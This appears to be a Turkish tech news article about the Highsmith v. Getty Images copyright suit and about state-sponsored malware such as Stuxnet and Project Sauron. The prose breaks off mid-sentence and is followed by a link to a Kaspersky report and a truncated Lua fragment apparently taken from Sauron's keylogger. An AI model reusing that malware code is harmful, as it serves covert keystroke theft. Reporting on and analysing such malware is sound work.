

## Getty Resim Servisine 1 Milyar Dolarlık Dava

Fotoğrafçı Carol Highsmith Getty Images adıyla bilinen ünlü stok resim servisini dava etti. Toplam 18.755 fotoğrafının Getty Images tarafından izinsiz satıldığını iddia eden fotoğrafçı 1 milyar dolarlık bir telif ücreti istiyor. Her şey fotoğrafının sitesinde kullandığı bir fotoğraf için 120 dolar telif ücreti ödemesi yönünde Getty Images'dan bir mektup almasıyla başlamış.

Mektupta Highsmith'in fotoğrafları izinsiz kullandığı, eğer ücret ödemezse dava edileceği yazıyordu. Highsmith'in iddiasına göre bu fotoğraflar kendisine ait ve Getty resim servisine de hiç yüklememiş. 1988'de özel arşivini Kongre Kütüphanesi'ne bağışlamış ve kamuya ücretsiz kullanım hakkı vermiş. Ancak bu hak fotoğrafların fotoğrafçıya referans

vermeden ticari olarak kullanılmasını içermiyor. Konunun ortaya çıkmasından sonra fotoğrafçının bütün itirazlarına rağmen Getty resim servisi fotoğrafları kullanmaya ve Highsmith de dâhil olmak üzere kullanıcılardan telif ücreti istemeye devam etmiş. Yavuz hırsız ev sahibini bastırır hesabı bir durumla karşı karşıya kalan Highsmith, Getty resim servisine

1 milyar dolarlık bir dava açmış. Davanın nasıl sonuçlanacağı merak konusu olsa da telif hakları konusu teknoloji dünyasında yer işgal etmeye devam edecek. 2010'da Oracle Java'ya ait kaynak kodlarının Google tarafından Android işletim sisteminde izinsiz kullanıldığı için 9 milyar dolarlık bir dava açmış, uzunca bir süre devam eden dava geçtiğimiz Mayıs ayında Google lehine sonuçlanmıştı.

## Devlet Destekli Virüsler

Bilgisayarlara bulaşan virüsler her zaman bilgisayar korsanları tarafından yazılmıyor. Birkaç kişinin yazamayacağı kadar karmaşık, özel organizasyonları hedef alan virüsler de var. Bu virüsler çoğunlukla devletler tarafından oluşturulmuş özel birimler tarafından geliştiriliyor. Stuxnet adındaki ünlü solucan yazılım İran'ın nükleer programını sekteye uğratmak için -resmen kabul edilmese de- ABD ve İsrail tarafından geliştirilmişti. Solucan, İrandaki bir nükleer santralde bulunan santrifujlerin normalden

daha hızlı dönerek kendini parçalamasına sebep olmuş ve santrifujlerin neredeyse %20'sini çalışmaz hale getirmişti. Geçtiğimiz günlerde güvenlik uzmanları tarafından Project Sauron adında yeni bir virüs tespit edildi. Çok üst düzey bir çalışma mekanizması olan virüsün 2011'den bu yana aktif olduğu ve tespit edilemediği belirlendi. Virüsü geliştiren ekibin geçmişteki üst düzey virüsleri ayrıntılı analiz ettiği, bunların iyi çalışan kısımlarını alıp kötü çalışan kısımları için yeni çözümler ürettiği görüldü. Sauron, özellikle antivirüs yazılımları

tarafından tespit edilmesinin önüne geçmek için her bilgisayarda farklı belirtiler veriyor. Bu virüs internet erişimi olmayan "güvenli" bilgisayarlardan veri elde etmek için özelleşmiş. Önce bulaştığı bilgisayardaki USB bellek üzerinde kendine has bir dosya sistemi ile depolama alanı oluşturuyor. Dosya sistemi farklı olduğu için bu alan Windows tarafından fark edilemiyor.

Daha sonra bilgisayardan elde edilen bilgiler bu alanda depolanıyor. Virüsün bu depolama alanını tam olarak nasıl kullandığı henüz keşfedilemedi. Son derece karmaşık bir yapısı olan virüsün en az elli tane farklı modülü var. Hedef bilgisayarın özelliklerine göre hangi modülleri etkinleştireceğine kendisi karar veriyor. Bulaştığı bilgisayarda hemen

[https://securelist.com/files/2016/07/The-ProjectSauron-APT\\_research\\_KL.pdf](https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf)

```
KBLOG_ROTATE_SECS = 10800
tmp_dir = os.getenv("WINDIR") .. "\\temp\\"
drive = "C:\\"
SAURON_KBLOG_KEY = "mISfx1q2Ef/QJPO4g16DMKD51xeQ380knDrULcZyTF5vFNwB"
create_log = function(l_1_0, l_1_1, l_1_2, l_1_3)
  local f = ""
  repeat
    w.sleep(1000)
    t1 = "b"
    t2 = "k"
    t3 = "a"
```